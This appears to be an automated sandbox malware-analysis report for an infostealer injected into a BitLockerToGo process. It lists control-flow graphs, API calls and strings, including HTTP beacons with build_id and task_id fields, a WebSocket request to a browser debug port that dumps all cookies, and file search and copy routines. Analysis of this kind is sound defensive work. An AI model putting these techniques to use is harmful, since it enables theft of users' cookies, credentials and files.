                                                                                                                                                                                                                                                                                                                                                          Function 02A06AE1 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 601networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 875 2a06ae1-2a06ba6 call 2a12175 call 2a049de call 2a12143 * 5 InternetOpenA StrCmpCA 890 2a06ba8 875->890 891 2a06bae-2a06bb4 875->891 890->891 892 2a07581-2a075a6 InternetCloseHandle call 2a091ff 891->892 893 2a06bba-2a06d44 call 2a138a6 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 2 InternetConnectA 891->893 898 2a075a8-2a075d4 call 2a121a5 call 2a12265 call 2a121e9 call 2a02910 892->898 899 2a075d9-2a0766e call 2a02910 * 4 call 2a01cce call 2a02910 * 3 call 2a1e88c 892->899 973 2a06d4a-2a06d88 HttpOpenRequestA 893->973 974 2a0757b 893->974 898->899 975 2a06d8e-2a06d94 973->975 976 2a0756f-2a07575 InternetCloseHandle 973->976 974->892 977 2a06db2-2a07503 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 2a288d0 lstrlen * 2 call 2a288d0 lstrlen HttpSendRequestA 975->977 978 2a06d96-2a06dac InternetSetOptionA 975->978 976->974 1217 2a07544-2a07561 InternetReadFile 977->1217 978->977 1218 2a07563-2a07569 InternetCloseHandle 1217->1218 1219 2a07505-2a0750d 1217->1219 1218->976 1219->1218 1220 2a0750f-2a0753f call 2a12265 call 2a121e9 call 2a02910 1219->1220 1220->1217
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A06B80
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A06B9E
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06D36
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A06D7A
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,",status,02A38B60,------,02A38B54,",task_id,02A38B40,------,02A38B34,",mode,02A38B20,------,02A38B14), ref: 02A0746C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0747B
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A07485
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A0748C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A07499
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A074A7
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A074B5
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A074C3
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A074D0
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A074E5
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,?,00000000), ref: 02A074F8
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000000C7,?), ref: 02A07559
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A07569
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A07575
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A07587
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06DAC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                                                                                                          • String ID: "$"$"$"$"$------$------$------$------$------$------$27536a38d3707b6600f28b9d7177a12c$build_id$mode$status$task_id
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3306106941-1549916387
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8cfad05bef2e5e46c1a193828a81024f7fc0e4254563cc61a94a3b9b6406de7b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d50f065b1a8e666b9eb9fba26d3effe8d7fdadf8a23a3b56696bda090da50c70
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cfad05bef2e5e46c1a193828a81024f7fc0e4254563cc61a94a3b9b6406de7b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90527231D802799ADF65EB61EE85BCDB376AF04310F0145E2AA0D73160DE71AF9A8F50
                                                                                                                                                                                                                                                                                                                                                          Function 02A07FAB Relevance: 60.2, APIs: 28, Strings: 6, Instructions: 715networkCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1226 2a07fab-2a08084 call 2a2fc10 call 2a102aa * 2 call 2a10532 call 2a10090 call 2a1045e 1239 2a08ac0 1226->1239 1240 2a0808a-2a080b1 call 2a102cd 1226->1240 1242 2a08ac5-2a08acb call 2a0ff15 1239->1242 1245 2a080e1-2a0813d call 2a1012d call 2a10151 call 2a1045e call 2a10532 1240->1245 1246 2a080b3-2a080df call 2a10532 1240->1246 1247 2a08ad0 1242->1247 1255 2a08143-2a08180 call 2a10151 call 2a1045e call 2a102cd 1245->1255 1246->1255 1250 2a08ad2-2a08b0d call 2a1045e * 3 call 2a1e88c 1247->1250 1274 2a08215-2a08222 1255->1274 1275 2a08186-2a08210 call 2a10532 call 2a10151 call 2a1045e call 2a10532 call 2a10151 call 2a1045e 1255->1275 1276 2a08224 1274->1276 1277 2a0822a-2a08249 call 2a13759 WSAStartup 1274->1277 1275->1274 1276->1277 1283 2a08255-2a0826c socket 1277->1283 1284 2a0824b-2a08250 1277->1284 1286 2a0827e-2a082b5 1283->1286 1287 2a0826e-2a08279 WSACleanup 1283->1287 1284->1242 1289 2a082b7 1286->1289 1290 2a082bd-2a082d5 getaddrinfo 1286->1290 1287->1242 1289->1290 1292 2a082d7-2a082fa closesocket WSACleanup call 2a0ff15 1290->1292 1293 2a082ff-2a08356 htons FreeAddrInfoW connect 1290->1293 1292->1250 1297 2a08374-2a0850e call 2a102aa call 2a10814 call 2a1022b call 2a10151 call 2a1086b call 2a1022b call 2a10151 call 2a1086b call 2a1022b call 2a10151 call 2a1086b call 2a1022b call 2a10151 call 2a1045e * 7 1293->1297 1298 2a08358-2a0836f closesocket WSACleanup 1293->1298 1343 2a08510 1297->1343 1344 2a08516-2a08530 send 1297->1344 1298->1242 1343->1344 1345 2a08570-2a08586 recv 1344->1345 1346 2a08532-2a0853f closesocket WSACleanup 1344->1346 1348 2a08588-2a0859a closesocket WSACleanup 1345->1348 1349 2a0859c-2a085cf call 2a102aa rand 1345->1349 1347 2a08544-2a0856b call 2a0ff15 call 2a1045e * 2 1346->1347 1347->1247 1348->1347 1355 2a085d1-2a085d7 1349->1355 1356 2a085d8-2a085e5 rand 1349->1356 1355->1356 1358 2a085e7-2a085ed 1356->1358 1359 2a085ee-2a085fb rand 1356->1359 1358->1359 1360 2a08604-2a08611 rand 1359->1360 1361 2a085fd-2a08603 1359->1361 1363 2a08613-2a08619 1360->1363 1364 2a0861a-2a08648 call 2a10250 1360->1364 1361->1360 1363->1364 1368 2a08658-2a08664 1364->1368 1369 2a0864a-2a08656 1364->1369 1371 2a08686-2a08695 call 2a10250 1368->1371 1372 2a08666-2a08678 call 2a10250 * 2 1368->1372 1370 2a08679-2a08684 call 2a10250 1369->1370 1379 2a086b9-2a086d2 call 2a0ff70 1370->1379 1380 2a08696-2a086b7 call 2a30a00 call 2a10250 1371->1380 1372->1370 1388 2a086d4-2a086e1 1379->1388 1389 2a0870c-2a08719 1379->1389 1380->1379 1393 2a086e3 1388->1393 1394 2a086e9-2a0870a call 2a10250 1388->1394 1390 2a08721-2a0873a send 1389->1390 1391 2a0871b 1389->1391 1395 2a0873c-2a0877a closesocket WSACleanup call 2a0ff15 call 2a1045e * 2 1390->1395 1396 2a0877f-2a087a8 1390->1396 1391->1390 1393->1394 1394->1388 1394->1389 1395->1396 1400 2a087af-2a087ca recv 1396->1400 1402 2a087d0-2a087f6 call 2a109d0 1400->1402 1403 2a089d7-2a08a10 call 2a10250 * 2 1400->1403 1410 2a0899d-2a089b4 1402->1410 1419 2a08a12 1403->1419 1420 2a08a14-2a08a49 send closesocket WSACleanup 1403->1420 1415 2a089ba 1410->1415 1416 2a087fb-2a0882c 1410->1416 1421 2a089c8-2a089d1 1415->1421 1417 2a0885e-2a08861 1416->1417 1418 2a0882e-2a08830 1416->1418 1423 2a08863-2a08865 1417->1423 1424 2a088b4-2a088c0 1417->1424 1418->1417 1422 2a08832-2a08839 1418->1422 1419->1420 1425 2a08a51-2a08a5e 1420->1425 1426 2a08a4b 1420->1426 1421->1400 1421->1403 1422->1421 1427 2a0883f-2a0885c 1422->1427 1423->1424 1428 2a08867-2a0886e 1423->1428 1431 2a088c2-2a088cb 1424->1431 1432 2a088dc-2a088f0 1424->1432 1429 2a08a60 1425->1429 1430 2a08a66-2a08abb call 2a108de call 2a10151 call 2a1045e * 3 call 2a104d8 1425->1430 1426->1425 1427->1424 1428->1421 1433 2a08874-2a0887a 1428->1433 1429->1430 1430->1239 1431->1421 1435 2a088d1-2a088da 1431->1435 1432->1421 1436 2a088f6 1432->1436 1439 2a08880-2a088ac 1433->1439 1435->1432 1437 2a08904-2a08917 call 2a108a7 1436->1437 1438 2a088f8-2a088fe 1436->1438 1445 2a0891c-2a08929 1437->1445 1438->1421 1438->1437 1439->1439 1442 2a088ae 1439->1442 1442->1424 1447 2a08955-2a08996 call 2a10b24 call 2a100e9 1445->1447 1448 2a0892b-2a0893b 1445->1448 1459 2a08998 call 2a104d8 1447->1459 1460 2a089bc-2a089c3 call 2a104d8 1447->1460 1448->1447 1450 2a0893d-2a08953 1448->1450 1450->1447 1450->1450 1459->1410 1460->1421
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10532: std::_Xinvalid_argument.LIBCPMT ref: 02A1054B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1045E: _memmove.LIBCMT ref: 02A10478
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A102CD: memchr.MSVCRT ref: 02A10336
                                                                                                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 02A08241
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10532: _memmove.LIBCMT ref: 02A1059D
                                                                                                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 02A0825D
                                                                                                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 02A0826E
                                                                                                                                                                                                                                                                                                                                                          • getaddrinfo.WS2_32(?,00000000,?,?), ref: 02A082CD
                                                                                                                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 02A082DD
                                                                                                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 02A082E3
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • HTTP/1.1Host: , xrefs: 02A083AB
                                                                                                                                                                                                                                                                                                                                                          • Sec-WebSocket-Version: 13, xrefs: 02A0847A
                                                                                                                                                                                                                                                                                                                                                          • :, xrefs: 02A0816B
                                                                                                                                                                                                                                                                                                                                                          • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 02A08435
                                                                                                                                                                                                                                                                                                                                                          • ws://, xrefs: 02A08055
                                                                                                                                                                                                                                                                                                                                                          • {"id":1,"method":"Network.getAllCookies"}, xrefs: 02A0859F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Cleanup_memmove$StartupXinvalid_argumentclosesocketgetaddrinfomemchrsocketstd::_
                                                                                                                                                                                                                                                                                                                                                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2519114892-1552268179
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d188c7a6403a3d06d3a2cc8829fe9d6c7b9293f018d89d06c4bfbe0046796c5e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 172b43fb2477371cacd1ba88877d089f569859adb7a1fbd7bae3e06b9deb3d57
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d188c7a6403a3d06d3a2cc8829fe9d6c7b9293f018d89d06c4bfbe0046796c5e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18628A71D402A89EDB249B64DD84AE9B7B5AF04320F0041EAE68DF7580CBB46FC9CF51
                                                                                                                                                                                                                                                                                                                                                          Function 02A16A05 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 2340 2a16a05-2a16aac call 2a2fc10 wsprintfA FindFirstFileA call 2a25490 * 2 2347 2a16ab2-2a16ac6 StrCmpCA 2340->2347 2348 2a16e68-2a16e7e call 2a01cce call 2a1e88c 2340->2348 2350 2a16e35-2a16e4a FindNextFileA 2347->2350 2351 2a16acc-2a16ae0 StrCmpCA 2347->2351 2353 2a16e5c-2a16e62 FindClose 2350->2353 2354 2a16e4c-2a16e4e 2350->2354 2351->2350 2355 2a16ae6-2a16b28 wsprintfA StrCmpCA 2351->2355 2353->2348 2354->2347 2357 2a16b47-2a16b59 wsprintfA 2355->2357 2358 2a16b2a-2a16b45 wsprintfA 2355->2358 2359 2a16b5c-2a16b99 call 2a25490 lstrcat 2357->2359 2358->2359 2363 2a16bbf-2a16bc6 strtok_s 2359->2363 2364 2a16bc8-2a16c06 call 2a25490 lstrcat strtok_s 2363->2364 2365 2a16b9b-2a16bac 2363->2365 2370 2a16dc6-2a16dca 2364->2370 2371 2a16c0c-2a16c1c PathMatchSpecA 2364->2371 2369 2a16bb2-2a16bbe 2365->2369 2365->2370 2369->2363 2370->2350 2372 2a16dcc-2a16dd2 2370->2372 2373 2a16c22-2a16cfb call 2a12143 call 2a138a6 call 2a12265 call 2a12223 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 5 DeleteFileA CopyFileA call 2a13dfd call 2a30840 2371->2373 2374 2a16d16-2a16d2b strtok_s 2371->2374 2372->2353 2375 2a16dd8-2a16de6 2372->2375 2410 2a16d36-2a16d42 2373->2410 2411 2a16cfd-2a16d11 DeleteFileA call 2a02910 2373->2411 2374->2371 2377 2a16d31 2374->2377 2375->2350 2378 2a16de8-2a16e2a call 2a01ced call 2a16a05 2375->2378 2377->2370 2387 2a16e2f 2378->2387 2387->2350 2412 2a16e53-2a16e5a call 2a02910 2410->2412 2413 2a16d48-2a16d6e call 2a12175 call 2a09148 2410->2413 2411->2374 2412->2348 2422 2a16d70-2a16db4 call 2a01ced call 2a12143 call 2a18be6 call 2a02910 2413->2422 2423 2a16dba-2a16dc1 call 2a02910 2413->2423 2422->2423 2423->2370
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16A59
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 02A16A70
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16A8C
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16A9D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37A38), ref: 02A16ABE
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37A3C), ref: 02A16AD8
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16AFF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3766E), ref: 02A16B13
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16B3C
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16B53
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16B65
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A16B7A
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A16BBF
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16BD1
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A16BE6
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A16BFF
                                                                                                                                                                                                                                                                                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02A16C14
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,02A37A68,02A3766F), ref: 02A16CCD
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A16CDD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13DFD: CreateFileA.KERNEL32(02A16CE9,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,02A16CE9,?), ref: 02A13E18
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A16CF3
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 02A16CFE
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A16D24
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 02A16E42
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A16E62
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
